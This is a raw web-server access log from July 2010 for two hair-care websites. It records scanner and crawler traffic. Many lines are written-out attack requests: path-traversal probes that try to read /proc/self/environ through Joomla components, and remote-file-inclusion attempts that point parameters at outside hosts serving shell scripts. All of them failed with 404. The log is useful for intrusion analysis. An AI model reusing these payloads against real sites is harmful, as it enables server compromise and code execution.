208.101.2.242 - - [12/Jul/2010:05:55:42 -0700] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
129.97.219.71 - - [12/Jul/2010:05:58:09 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; Media Center PC 6.0; InfoPath.2; MS-RTC LM 8)" "growlonghairfast.com"
218.145.71.241 - - [12/Jul/2010:05:58:09 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
218.145.71.241 - - [12/Jul/2010:05:58:10 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
218.145.71.241 - - [12/Jul/2010:05:58:11 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
212.95.58.206 - - [12/Jul/2010:06:00:05 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/0.91 Beta (Windows)" "growlonghairfast.com"
212.95.58.206 - - [12/Jul/2010:06:00:06 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/0.91 Beta (Windows)" "growlonghairfast.com"
174.121.64.231 - - [12/Jul/2010:06:01:19 -0700] "GET /logs/access.log//index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
174.121.64.231 - - [12/Jul/2010:06:01:20 -0700] "GET /index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
174.121.64.231 - - [12/Jul/2010:06:01:20 -0700] "GET /logs//index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
94.23.38.229 - - [12/Jul/2010:06:04:54 -0700] "GET /logs/access.log//index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
94.23.38.229 - - [12/Jul/2010:06:04:54 -0700] "GET /index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
94.23.38.229 - - [12/Jul/2010:06:04:54 -0700] "GET /logs//index.php?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
195.5.163.206 - - [12/Jul/2010:06:08:44 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
67.205.102.122 - - [12/Jul/2010:06:08:50 -0700] "POST /logs/xml HTTP/1.1" 404 - "-" "MaMa CaSpEr" "growlonghairfast.com"
195.5.163.206 - - [12/Jul/2010:06:08:55 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
67.205.102.122 - - [12/Jul/2010:06:09:03 -0700] "POST /xml HTTP/1.1" 404 - "-" "MaMa CaSpEr" "growlonghairfast.com"
67.205.102.122 - - [12/Jul/2010:06:09:04 -0700] "POST /logs/access.log%20%20/xml HTTP/1.1" 404 - "-" "MaMa CaSpEr" "growlonghairfast.com"
67.205.102.122 - - [12/Jul/2010:06:09:06 -0700] "POST /xml HTTP/1.1" 404 - "-" "MaMa CaSpEr" "growlonghairfast.com"
67.205.102.122 - - [12/Jul/2010:06:09:06 -0700] "POST /logs/access.log/xml HTTP/1.1" 404 - "-" "MaMa CaSpEr" "growlonghairfast.com"
67.205.102.122 - - [12/Jul/2010:06:09:08 -0700] "POST /logs/xml HTTP/1.1" 404 - "-" "MaMa CaSpEr" "growlonghairfast.com"
87.118.100.208 - - [12/Jul/2010:06:10:41 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 9.0" "www.freehairsecrets.com"
87.118.100.208 - - [12/Jul/2010:06:10:41 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 9.0" "www.freehairsecrets.com"
129.97.219.71 - - [12/Jul/2010:06:15:05 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; Media Center PC 6.0; InfoPath.2; MS-RTC LM 8)" "growlonghairfast.com"
67.205.102.122 - - [12/Jul/2010:06:17:30 -0700] "POST /logs/access_100621.log/xml HTTP/1.1" 404 - "-" "MaMa CaSpEr" "growlonghairfast.com"
218.145.71.241 - - [12/Jul/2010:06:26:02 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
218.145.71.241 - - [12/Jul/2010:06:26:03 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
218.145.71.241 - - [12/Jul/2010:06:26:03 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
91.212.226.240 - - [12/Jul/2010:06:26:42 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; KTXN)" "growlonghairfast.com"
91.212.226.240 - - [12/Jul/2010:06:26:42 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; KTXN)" "growlonghairfast.com"
77.222.34.35 - - [12/Jul/2010:06:27:23 -0700] "GET /logs/access.log//index.php?option=com_canteen&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
77.222.34.35 - - [12/Jul/2010:06:27:24 -0700] "GET /index.php?option=com_canteen&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
77.222.34.35 - - [12/Jul/2010:06:27:24 -0700] "GET /logs//index.php?option=com_canteen&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.freehairsecrets.com"
129.97.219.71 - - [12/Jul/2010:06:31:22 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "growlonghairfast.com"
174.121.64.231 - - [12/Jul/2010:06:31:29 -0700] "GET //index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
91.212.226.240 - - [12/Jul/2010:06:36:35 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "freehairsecrets.com"
91.212.226.240 - - [12/Jul/2010:06:36:35 -0700] "GET / HTTP/1.0" 200 910 "http://freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "freehairsecrets.com"
62.44.123.3 - - [12/Jul/2010:06:36:39 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.thwanesafaris.com/images/1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.44.123.3 - - [12/Jul/2010:06:36:39 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.thwanesafaris.com/images/1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.44.123.3 - - [12/Jul/2010:06:36:39 -0700] "GET /logs/access_100315.log%20%20//include/print_category.php?setup[use_category]=1&dir=http://www.thwanesafaris.com/images/1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.121.64.231 - - [12/Jul/2010:06:37:47 -0700] "GET /logs/access.log///index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
174.121.64.231 - - [12/Jul/2010:06:37:47 -0700] "GET //index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
174.121.64.231 - - [12/Jul/2010:06:37:48 -0700] "GET /logs///index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
62.44.123.3 - - [12/Jul/2010:06:38:07 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.thwanesafaris.com/images/1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.44.123.3 - - [12/Jul/2010:06:38:08 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.thwanesafaris.com/images/1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.44.123.3 - - [12/Jul/2010:06:38:32 -0700] "GET /logs/access_100315.log%20%20//include/print_category.php?setup[use_category]=1&dir=http://www.thwanesafaris.com/images/1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
69.175.62.242 - - [12/Jul/2010:06:38:46 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
195.5.163.206 - - [12/Jul/2010:06:40:56 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
195.5.163.206 - - [12/Jul/2010:06:40:56 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
195.5.163.206 - - [12/Jul/2010:06:40:56 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
195.5.163.206 - - [12/Jul/2010:06:41:20 -0700] "GET /logs/access_100628.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
195.5.163.206 - - [12/Jul/2010:06:41:20 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
195.5.163.206 - - [12/Jul/2010:06:41:20 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
195.5.163.206 - - [12/Jul/2010:06:43:07 -0700] "GET /logs/access_100705.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
62.44.123.3 - - [12/Jul/2010:06:43:23 -0700] "GET /logs/access_100315.log//include/print_category.php?setup[use_category]=1&dir=http://www.thwanesafaris.com/images/1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.44.123.3 - - [12/Jul/2010:06:44:47 -0700] "GET /logs/access_100315.log//include/print_category.php?setup[use_category]=1&dir=http://www.thwanesafaris.com/images/1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
94.23.8.200 - - [12/Jul/2010:06:45:22 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
83.125.73.96 - - [12/Jul/2010:06:45:25 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
208.43.40.176 - - [12/Jul/2010:06:46:20 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
94.23.46.76 - - [12/Jul/2010:06:46:30 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
94.23.8.200 - - [12/Jul/2010:06:46:31 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
83.125.73.96 - - [12/Jul/2010:06:46:33 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
94.23.46.76 - - [12/Jul/2010:06:46:33 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
81.93.240.134 - - [12/Jul/2010:06:46:39 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
208.43.40.176 - - [12/Jul/2010:06:47:41 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
81.93.240.134 - - [12/Jul/2010:06:48:32 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
129.97.219.71 - - [12/Jul/2010:06:49:01 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)" "growlonghairfast.com"
208.80.193.121 - - [12/Jul/2010:06:52:08 -0700] "GET / HTTP/1.0" 200 910 "-" "Mozilla/4.0 (compatible; MSIE 7.0; America Online Browser 1.1; rev1.2; Windows NT 5.1; FunWebProducts; .NET CLR 1.1.4322; FDM)" "www.freehairsecrets.com"
208.115.111.248 - - [12/Jul/2010:07:04:10 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.245 - - [12/Jul/2010:07:05:41 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [12/Jul/2010:07:05:41 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
129.97.219.71 - - [12/Jul/2010:07:07:17 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.25 (jaunty) Firefox/3.8" "growlonghairfast.com"
195.5.163.206 - - [12/Jul/2010:07:11:31 -0700] "GET /logs/access_100614.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
69.175.62.242 - - [12/Jul/2010:07:15:22 -0700] "GET /*.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
87.118.100.208 - - [12/Jul/2010:07:23:00 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 4.0) Opera 7.0 [en]" "growlonghairfast.com"
87.118.100.208 - - [12/Jul/2010:07:23:00 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 4.0) Opera 7.0 [en]" "growlonghairfast.com"
129.97.219.71 - - [12/Jul/2010:07:23:02 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; Media Center PC 6.0; InfoPath.2; MS-RTC LM 8)" "growlonghairfast.com"
217.113.61.155 - - [12/Jul/2010:07:28:31 -0700] "GET /bbs///////good.php?board_skin_path=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "growlonghairfast.com"
217.113.61.155 - - [12/Jul/2010:07:28:31 -0700] "GET /logs//bbs///////good.php?board_skin_path=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "growlonghairfast.com"
217.113.61.155 - - [12/Jul/2010:07:28:31 -0700] "GET /logs/access_100215.log%20%20//bbs///////good.php?board_skin_path=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "growlonghairfast.com"
217.113.61.155 - - [12/Jul/2010:07:30:17 -0700] "GET /bbs///////good.php?board_skin_path=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.freehairsecrets.com"
217.113.61.155 - - [12/Jul/2010:07:30:17 -0700] "GET /logs//bbs///////good.php?board_skin_path=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.freehairsecrets.com"
217.113.61.155 - - [12/Jul/2010:07:30:17 -0700] "GET /logs/access.log//bbs///////good.php?board_skin_path=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.freehairsecrets.com"
69.175.62.242 - - [12/Jul/2010:07:31:05 -0700] "GET /logs/access.log/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
69.175.62.242 - - [12/Jul/2010:07:31:05 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
69.175.62.242 - - [12/Jul/2010:07:31:05 -0700] "GET /logs/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
208.115.111.245 - - [12/Jul/2010:07:33:20 -0700] "GET /freehairsecretsphp/viewtopic.php?p=10095 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [12/Jul/2010:07:33:23 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12611 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [12/Jul/2010:07:33:28 -0700] "GET /freehairsecretsphp/viewtopic.php?p=18836 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [12/Jul/2010:07:33:32 -0700] "GET /freehairsecretsphp/viewtopic.php?p=18857 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [12/Jul/2010:07:33:37 -0700] "GET /freehairsecretsphp/viewtopic.php?p=18925 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
81.19.215.12 - - [12/Jul/2010:07:33:51 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
81.19.215.12 - - [12/Jul/2010:07:33:52 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
91.212.226.210 - - [12/Jul/2010:07:33:52 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "growlonghairfast.com"
91.212.226.210 - - [12/Jul/2010:07:33:52 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "growlonghairfast.com"
208.115.111.245 - - [12/Jul/2010:07:34:41 -0700] "GET /freehairsecretsphp/viewtopic.php?p=11471 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [12/Jul/2010:07:34:46 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13588 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
119.63.198.75 - - [12/Jul/2010:07:34:51 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13818 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "growlonghairfast.com"
208.115.111.245 - - [12/Jul/2010:07:34:51 -0700] "GET /freehairsecretsphp/viewtopic.php?p=15183 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [12/Jul/2010:07:34:56 -0700] "GET /freehairsecretsphp/viewtopic.php?p=17622 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
208.115.111.245 - - [12/Jul/2010:07:35:03 -0700] "GET /freehairsecretsphp/viewtopic.php?p=17696 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "freehairsecrets.com"
217.113.61.155 - - [12/Jul/2010:07:35:25 -0700] "GET /logs/access_100208.log%20%20//bbs///////good.php?board_skin_path=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "growlonghairfast.com"
188.127.248.175 - - [12/Jul/2010:07:35:51 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://cybershell.fileave.com/Ckrid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.127.248.175 - - [12/Jul/2010:07:35:51 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://cybershell.fileave.com/Ckrid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.127.248.175 - - [12/Jul/2010:07:35:54 -0700] "GET /logs/access_100308.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://cybershell.fileave.com/Ckrid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.127.248.175 - - [12/Jul/2010:07:35:58 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://cybershell.fileave.com/Ckrid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.127.248.175 - - [12/Jul/2010:07:35:58 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://cybershell.fileave.com/Ckrid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.127.248.175 - - [12/Jul/2010:07:36:02 -0700] "GET /logs/access_100308.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://cybershell.fileave.com/Ckrid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.66.208.75 - - [12/Jul/2010:07:38:42 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://nbsincorp.com" "Mozilla/4.7 (compatible; OffByOne; Windows 2000) Webster Pro V3.4" "www.freehairsecrets.com"
65.190.175.30 - - [12/Jul/2010:07:38:52 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.7 (compatible; OffByOne; Windows 2000) Webster Pro V3.4" "www.freehairsecrets.com"
88.167.195.237 - - [12/Jul/2010:07:39:04 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.7 (compatible; OffByOne; Windows 2000) Webster Pro V3.4" "www.freehairsecrets.com"
174.64.163.190 - - [12/Jul/2010:07:39:09 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.7 (compatible; OffByOne; Windows 2000) Webster Pro V3.4" "www.freehairsecrets.com"
60.10.134.103 - - [12/Jul/2010:07:39:15 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.7 (compatible; OffByOne; Windows 2000) Webster Pro V3.4" "www.freehairsecrets.com"
88.167.195.237 - - [12/Jul/2010:07:39:25 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.7 (compatible; OffByOne; Windows 2000) Webster Pro V3.4" "www.freehairsecrets.com"
118.123.241.163 - - [12/Jul/2010:07:39:27 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.7 (compatible; OffByOne; Windows 2000) Webster Pro V3.4" "www.freehairsecrets.com"
129.97.219.71 - - [12/Jul/2010:07:39:53 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; Media Center PC 6.0; InfoPath.2; MS-RTC LM 8)" "growlonghairfast.com"
67.10.108.162 - - [12/Jul/2010:07:40:21 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.7 (compatible; OffByOne; Windows 2000) Webster Pro V3.4" "www.freehairsecrets.com"
58.56.108.35 - - [12/Jul/2010:07:40:36 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.7 (compatible; OffByOne; Windows 2000) Webster Pro V3.4" "www.freehairsecrets.com"
